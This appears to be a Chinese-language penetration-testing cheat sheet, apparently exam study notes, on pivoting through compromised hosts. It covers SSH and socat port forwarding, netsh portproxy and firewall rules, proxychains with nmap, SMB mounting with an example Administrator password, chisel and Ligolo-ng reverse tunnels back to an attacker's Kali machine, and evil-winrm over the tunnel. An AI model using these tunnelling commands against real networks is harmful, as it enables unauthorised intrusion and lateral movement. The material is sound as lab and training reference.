跳转至

内网穿透

本地端口转发

Bash
# 将 10.129.207.212 本地 9081 端口转发至本地 9081 端口
ssh -N -L 9081:127.0.0.1:9081 mark@10.129.207.212

# 使用 socat 将访问本地 443 端口转发至 192.168.170.140:443
sudo socat TCP-LISTEN:443,fork TCP:192.168.170.140:443

# 通过本地的 1080 端口建立通往 10.11.0.128 socks 隧道
ssh -N -D 1080 student@10.11.0.128

# 配置 proxychains4,使用本地 1080 端口的 SOCKS5 代理
sudo vi /etc/proxychains4.conf
tcp_read_time_out 2000
tcp_connect_time_out 1000
socks5 127.0.0.1 1080

# 通过代理执行 nmap 扫描
sudo proxychains nmap -vv -sT --top-ports=20 -Pn 192.168.18.1 --open

# 修改 Samba 配置,启用 SMBv2 协议支持
sudo nano /etc/samba/smb.conf
min protocol = SMB2

远程端口转发

Bash
# 在目标主机通过 ssh 将本地 3306 转发至 kali 3306
ssh -N -R 3306:127.0.0.1:3306 kali@10.11.0.4

# 添加端口代理规则,将 10.11.0.22:4455 流量转发到 192.168.1.110:445
netsh interface portproxy add v4tov4 listenport=4455 listenaddress=10.11.0.22 connectport=445 connectaddress=192.168.1.110

# 添加防火墙规则,允许 10.11.0.22:4455 的入站连接
netsh advfirewall firewall add rule name="forward_port_rule" protocol=TCP dir=in localip=10.11.0.22 localport=4455 action=allow

# 列出转发后的 SMB 共享
smbclient -L 10.11.0.22 --port=4455 --user=Administrator

# 挂载远程 SMB 共享到本地 /mnt/win10_share
sudo mkdir /mnt/win10_share
sudo mount -t cifs -o port=4455 //10.11.0.22/Data -o username=Administrator,password=Qwerty09! /mnt/win10_share

chisel 工具使用

Bash
# 搭建端口转发(反向)
## --- Kali 端(服务端端) ---
## 启动 Chisel 服务端,监听 8080 端口,启用反向代理模式
./chisel server -p 8080 --reverse
## --- 目标机(客户端) ---
## 启动 Chisel 客户端,连接到 Kali
## 实现访问 kali 1080 可访问到目标机器 22 端口
chisel-x64.exe client <kali_IP>:8080 R:1080:127.0.0.1:22

# 搭建端口转发(正向)
## --- Kali 端(客户端) ---
## 启动 Chisel 客户端
## 实现访问 kali 1080 可访问到目标机器 22 端口
./chisel client <client_ip>:8080 1080:127.0.0.1:22
## --- 目标机(服务端) ---
## 启动 Chisel 服务端,等待 Kali
chisel-x64.exe server -p 8080

# 搭建 socks 隧道(反向)
## --- Kali 端(服务端) ---
## 启动 Chisel 服务端,监听 8080 端口,启用反向代理模式
./chisel server -p 8080 --reverse
## --- 目标机(客户端) ---
## 启动 Chisel 客户端
## 实现访问 kali socks 1080 端口的流量全部转发给目标机,用于内网穿透
chisel-x64.exe client <kali_IP>:8080 R:1080:socks

# 搭建 socks 隧道(正向)
## --- Kali 端(客户端) ---
## 启动 Chisel 客户端
## 实现访问 kali socks 1080 端口的流量全部转发给目标机,用于内网穿透
./chisel client <cline_ip>:8080 1080:socks
## --- 目标机(服务端) ---
## 启动 Chisel 服务端,监听 8080 端口,等待 kali 连接
chisel-x64.exe server -p 8080

# 配置 proxychains
## --- Kali 端(配置代理) ---
## 配置 proxychains,使用 Chisel 提供的 SOCKS5 代理
sudo vi /etc/proxychains.conf
socks5 127.0.0.1 1080

# 通过代理执行 evil-winrm
proxychains evil-winrm -u administrator -p password -i 10.0.0.1

Ligolo-ng 工具使用

设置单台主机隧道

Bash
1
2
3
4
5
6
7
8
# 启动服务端,注意建议不开启 web 功能
sudo ./ligolo-ng_proxy_0.8.2_linux_amd64 -selfcert -laddr 0.0.0.0:7777
# 启动客户端
.\agent -connect 10.10.16.19:7777 -ignore-cert -retry
session # 设置session
ifcreate --name f0ne
route_add --name f0ne --route 240.0.0.1/32
start --tun f0ne

设置网段隧道

Bash
# 服务端设置(kali),为隧道创建网络接口
# sudo ip tuntap add user [your_username] mode tun ligolo
sudo ip tuntap add user kali mode tun ligolo
sudo ip link set ligolo up
# 启动服务端,注意建议不开启 web 功能
./ligolo-ng_proxy_0.8.2_linux_amd64 -selfcert -laddr 0.0.0.0:7777

# 客户端启动
agent.exe -connect 192.168.56.122:7777 -ignore-cert

# 启动隧道,启动前需要设置路由转发规则
sudo ip route add 192.168.0.0/24 dev ligolo
session
tunnel_start

ligolo-mp 工具使用

Bash
1
2
3
# 注意⚠️:我在考试过程使用 ligolo-mp 一直没有成功建立客户端到服务端连接
# 以下博客可以借鉴参考,实战会有帮助
# URL:https://www.f0nesec.top/2025/10/14/ligolo-mp-tools/